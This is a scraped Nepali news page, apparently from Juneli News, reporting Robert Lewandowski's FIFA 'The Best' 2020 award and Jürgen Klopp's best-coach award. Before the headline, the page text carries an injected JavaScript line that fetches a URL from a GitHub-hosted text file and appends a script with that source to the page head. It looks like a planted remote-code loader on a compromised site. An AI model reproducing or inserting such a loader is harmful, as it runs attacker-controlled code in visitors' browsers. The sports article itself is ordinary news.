;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); लेवान्दोस्की फिफा वर्ष २०२० को उत्कृष्ट खेलाडी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • लेवान्दोस्की फिफा वर्ष २०२० को उत्कृष्ट खेलाडी
खेलकुद

लेवान्दोस्की फिफा वर्ष २०२० को उत्कृष्ट खेलाडी

पुस ३,

काठमाण्डाै । फिफाको वर्ष २०२० को ‘द बेष्ट’को उपाधि रोबर्ट लेवान्दोस्कीले पाएका छन् ।

उपाधि जितेसँगै लेवान्दोस्कीले लियोनल मेस्सी र क्रिस्टियानो रोनाल्डोको वर्चश्वलाई फेरि एक पटक तोडेका छन् ।

मेस्सी र रोनाल्डोलाई पछि पार्दै अन्तिम मनोनयनमा उनले पहिलो पटक यो अवार्ड जितेका हुन । लेवान्दाेस्कीले पछिल्लो सिजन बायर्न म्युनिखलाई युरोपको सर्वोत्कृष्ट सफल क्लब बनाउन भूमिका खेलेका थिए । उनी च्याम्पियन्स लिगमा सर्वाधिक गोलकर्ता बनेका थिए भने टिमलाई च्याम्पियन्स लिगको उपाधि दिलाउन ठूलो भूमिका खेलेका थिए ।

यसका साथै उनले टिमलाई घरेलु लिग बुन्डेसलिगको उपाधि जितेका थिए ।

यस्तै, फिफाको उत्कृष्ट प्रशिक्षकको अवार्ड लिभरपुलका प्रशिक्षक योर्गेन क्लोपले जितेका छन । उनले लगातार दोस्रो पटक यो अवार्ड जितेका हुन । उनले २०१९ मा पनि उत्कृष्ट प्रशिक्षकको उपाधि जितेका थिए ।

 

फेसबुक प्रतिक्रियाहरु